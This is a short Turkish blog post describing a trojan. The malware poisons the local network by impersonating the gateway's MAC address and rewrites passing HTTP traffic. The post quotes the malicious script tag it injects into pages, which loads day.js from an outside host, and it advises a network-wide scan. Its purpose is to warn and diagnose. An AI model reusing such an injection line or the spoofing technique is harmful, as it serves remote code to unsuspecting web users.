Yine bir virüs...

Son günlerde çokça karşıma çıkan bir virüsten (aslında sanırım bir truva atı) bahsetmek istiyorum. Aslında virüsün çalışma şeklinin ne IIS'le ne de ASP.NET'le bir ilgisi yok. Ancak, web sitelerine erişimde sorun yarattığından sorun yaşayanlar önce bize geldiler ve bu virüsten bu şekilde haberim oldu. Bu açıdan (örneğin 401 hatasına neden olabiliyor) aslında burada bahsettiğim virüsle benzerlikler göstermektedir.

Virüsün teknik detaylarını, nasıl çalıştığını, nasıl bir güvenlik sorununa neden olduğunu bilmiyorum. Internet üzerinde bununla ilgili çok fazla detay bulamadım. Ancak, bizim yaptığımız incelemelere göre, bir makineye bulaştıktan sonra, makinenin bağlı bulunduğu ağdaki "ağ geçidinin" (gateway) MAC adresini "spoof" ediyor. Yani kendisini ağ geçidi gibi gösteriyor. Bu şekilde ağdaki diğer makinelerin trafiğinin kendisi üzerinden geçmesini sağlıyor. Bunu yaptıktan sonra da, kendi üzerinden geçen HTTP trafiğini bozuyor. Bozmaktan tam olarak kastım, bazı "header" bilgilerini siliyor ve HTML kodunun en başına şuna benzer bir satır ekliyor:

<script language="javascript" src="https://v.freefl.info/day.js"></script>

Dolayısıyla, ağdaki herhangi bir makineden birisi Internet'te herhangi bir sayfaya ulaşmaya çalıştığında "days.js" isimli dosyayı da indirmiş oluyor. Bu dosyanın içeriğini tam olarak bilemiyorum. Ben indirmeye çalıştığımda 404 hatası alıyorum. Ancak başka sunucular/adresler kullanarak virüsün yayılmaya devam etmesi olası görünüyor.

ÇÖZÜM:

Bu virüsü, bu yazıyı hazırladığım sırada, tanıyabilen çok fazla antivirüs uygulaması bulunmuyordu. Ancak tahmin ediyorum yakın zamanda tüm antivirüsler tanıyabilecektir. Burada önemli olan nokta şu: Bizim sorunu gözlemlediğimiz makine, çoğu zaman aslında enfekte olan makine olmayacaktır. Virüs, ağdaki herhangi bir makinede bulunuyor olabilir. Belki ağ paketlerini izleyerek hangi makinede olduğunu bulabiliriz. Ama bence her koşulda ağda genel bir tarama yapmak daha doğru olacaktır.

CENK ISCAN